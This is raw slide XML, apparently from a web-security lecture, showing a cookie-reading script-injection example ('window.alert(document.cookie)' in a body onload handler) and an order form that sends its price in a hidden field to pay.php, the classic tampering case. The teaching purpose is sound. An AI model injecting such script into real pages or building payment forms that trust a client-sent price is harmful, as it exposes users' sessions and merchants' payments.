              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> displays all the cookies associated with the current document in an alert message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="88"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;body  onload="window.alert(document.cookie);"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18"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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6DE200-BAF5-0540-AAE1-5FB60E26AC96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1820863" y="2960688"/>
            <a:ext cx="7399337" cy="3133725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6303645"/>
              <a:gd name="T1" fmla="*/ 0 h 3133725"/>
              <a:gd name="T2" fmla="*/ 132455570 w 6303645"/>
              <a:gd name="T3" fmla="*/ 0 h 3133725"/>
              <a:gd name="T4" fmla="*/ 132455570 w 6303645"/>
              <a:gd name="T5" fmla="*/ 3133425 h 3133725"/>
              <a:gd name="T6" fmla="*/ 0 w 6303645"/>
              <a:gd name="T7" fmla="*/ 3133425 h 3133725"/>
              <a:gd name="T8" fmla="*/ 0 w 6303645"/>
              <a:gd name="T9" fmla="*/ 0 h 31337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03645" h="3133725">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6303224" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6303224" y="3133425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3133425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="982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51" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C6DBE9-1B3C-5543-B5A4-5A6A17C0AD79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1841500" y="2984500"/>
            <a:ext cx="803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700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06B83D10-B537-5243-8A75-93587AB943F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1841500" y="3238500"/>
            <a:ext cx="577850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&lt;head&gt; &lt;title&gt;Pay&lt;/title&gt; &lt;/head&gt;</a:t>
            </a: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&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;form action=“submit_order” method=“GET”&gt;  The total cost is $5.50. Confirm order?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3C5F299-2611-534C-B50C-4662288E0758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841500" y="4522788"/>
            <a:ext cx="803275" cy="811212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="60"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27654" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6762CC5-CA5C-C94E-898C-A8D28013358D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2749550" y="4521200"/>
            <a:ext cx="171132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gn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type=“hidden”  type=“submit”  type=“submit”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27655" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A21E69EF-EED4-0D44-918F-BF6FD1E8D3D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4564063" y="4521200"/>
            <a:ext cx="339725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1700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name=“price” value=“5.50”&gt;  name=“pay” value=“yes”&gt;  name=“pay” value=“no”&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27656" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C27545D3-AA8F-CD45-A0BB-995DC0B4FAA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1841500" y="5537200"/>
            <a:ext cx="9334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&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87B46B2F-78C1-CA44-8E72-D4673B584374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2730500" y="1955800"/>
            <a:ext cx="4597400" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>What’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>presented to the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27658" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D9B72DF-574F-7E4A-B3A6-01F68FCF68F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1781175" y="4498975"/>
            <a:ext cx="6667500" cy="3778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27659" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0242FD4B-452C-8D45-91DF-0FA2F4B75508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1801813" y="4495800"/>
            <a:ext cx="6588125" cy="298450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6588759"/>
              <a:gd name="T1" fmla="*/ 150988 h 298450"/>
              <a:gd name="T2" fmla="*/ 0 w 6588759"/>
              <a:gd name="T3" fmla="*/ 147339 h 298450"/>
              <a:gd name="T4" fmla="*/ 7488 w 6588759"/>
              <a:gd name="T5" fmla="*/ 100768 h 298450"/>
              <a:gd name="T6" fmla="*/ 28359 w 6588759"/>
              <a:gd name="T7" fmla="*/ 60322 h 298450"/>
              <a:gd name="T8" fmla="*/ 60184 w 6588759"/>
              <a:gd name="T9" fmla="*/ 28428 h 298450"/>
              <a:gd name="T10" fmla="*/ 100538 w 6588759"/>
              <a:gd name="T11" fmla="*/ 7511 h 298450"/>
              <a:gd name="T12" fmla="*/ 147017 w 6588759"/>
              <a:gd name="T13" fmla="*/ 0 h 298450"/>
              <a:gd name="T14" fmla="*/ 6426970 w 6588759"/>
              <a:gd name="T15" fmla="*/ 0 h 298450"/>
              <a:gd name="T16" fmla="*/ 6473443 w 6588759"/>
              <a:gd name="T17" fmla="*/ 7511 h 298450"/>
              <a:gd name="T18" fmla="*/ 6513799 w 6588759"/>
              <a:gd name="T19" fmla="*/ 28428 h 298450"/>
              <a:gd name="T20" fmla="*/ 6545623 w 6588759"/>
              <a:gd name="T21" fmla="*/ 60322 h 298450"/>
              <a:gd name="T22" fmla="*/ 6566492 w 6588759"/>
              <a:gd name="T23" fmla="*/ 100768 h 298450"/>
              <a:gd name="T24" fmla="*/ 6573985 w 6588759"/>
              <a:gd name="T25" fmla="*/ 147339 h 298450"/>
              <a:gd name="T26" fmla="*/ 6573985 w 6588759"/>
              <a:gd name="T27" fmla="*/ 150988 h 298450"/>
              <a:gd name="T28" fmla="*/ 6566492 w 6588759"/>
              <a:gd name="T29" fmla="*/ 197559 h 298450"/>
              <a:gd name="T30" fmla="*/ 6545623 w 6588759"/>
              <a:gd name="T31" fmla="*/ 238005 h 298450"/>
              <a:gd name="T32" fmla="*/ 6513799 w 6588759"/>
              <a:gd name="T33" fmla="*/ 269900 h 298450"/>
              <a:gd name="T34" fmla="*/ 6473443 w 6588759"/>
              <a:gd name="T35" fmla="*/ 290817 h 298450"/>
              <a:gd name="T36" fmla="*/ 6426970 w 6588759"/>
              <a:gd name="T37" fmla="*/ 298328 h 298450"/>
              <a:gd name="T38" fmla="*/ 147017 w 6588759"/>
              <a:gd name="T39" fmla="*/ 298328 h 298450"/>
              <a:gd name="T40" fmla="*/ 100538 w 6588759"/>
              <a:gd name="T41" fmla="*/ 290817 h 298450"/>
              <a:gd name="T42" fmla="*/ 60184 w 6588759"/>
              <a:gd name="T43" fmla="*/ 269900 h 298450"/>
              <a:gd name="T44" fmla="*/ 28359 w 6588759"/>
              <a:gd name="T45" fmla="*/ 238005 h 298450"/>
              <a:gd name="T46" fmla="*/ 7488 w 6588759"/>
              <a:gd name="T47" fmla="*/ 197559 h 298450"/>
              <a:gd name="T48" fmla="*/ 0 w 6588759"/>
              <a:gd name="T49" fmla="*/ 150988 h 2984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588759" h="298450">
                <a:moveTo>
                  <a:pt x="0" y="150988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="147339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7511" y="100768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28428" y="60322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60322" y="28428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100768" y="7511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147339" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6441212" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6487786" y="7511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6528232" y="28428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6560126" y="60322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6581041" y="100768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6588552" y="147339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6588552" y="150988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6581041" y="197559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6560126" y="238005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6528232" y="269900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6487786" y="290817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6441212" y="298328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147339" y="298328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100768" y="290817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60322" y="269900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28428" y="238005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7511" y="197559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="150988"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="39290">
            <a:solidFill>
              <a:srgbClr val="B36AE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660" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A2AD71D-3B94-1344-91E4-67994F11893C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7253288" y="2633663"/>
            <a:ext cx="1301750" cy="482600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1301115"/>
              <a:gd name="T1" fmla="*/ 0 h 481330"/>
              <a:gd name="T2" fmla="*/ 1315735 w 1301115"/>
              <a:gd name="T3" fmla="*/ 0 h 481330"/>
              <a:gd name="T4" fmla="*/ 1315735 w 1301115"/>
              <a:gd name="T5" fmla="*/ 511377 h 481330"/>
              <a:gd name="T6" fmla="*/ 0 w 1301115"/>
              <a:gd name="T7" fmla="*/ 511377 h 481330"/>
              <a:gd name="T8" fmla="*/ 0 w 1301115"/>
              <a:gd name="T9" fmla="*/ 0 h 481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1115" h="481330">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1301051" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301051" y="481304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="48130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7661" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A3ACD07-4807-B04A-961D-A00088F9B3AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7253288" y="2633663"/>
            <a:ext cx="1301750" cy="482600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1301115"/>
              <a:gd name="T1" fmla="*/ 0 h 481330"/>
              <a:gd name="T2" fmla="*/ 1315733 w 1301115"/>
              <a:gd name="T3" fmla="*/ 0 h 481330"/>
              <a:gd name="T4" fmla="*/ 1315733 w 1301115"/>
              <a:gd name="T5" fmla="*/ 511382 h 481330"/>
              <a:gd name="T6" fmla="*/ 0 w 1301115"/>
              <a:gd name="T7" fmla="*/ 511382 h 481330"/>
              <a:gd name="T8" fmla="*/ 0 w 1301115"/>
              <a:gd name="T9" fmla="*/ 0 h 4813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1115" h="481330">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1301049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301049" y="481309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="481309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="1964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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4EEB65-AAAC-0046-A9EC-84E9DB3593B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7289800" y="2667000"/>
            <a:ext cx="1238250" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pa</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-235" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.php</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{803581DB-C879-3D41-9A28-A8013DF49540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-152400" y="838200"/>
            <a:ext cx="9820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ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
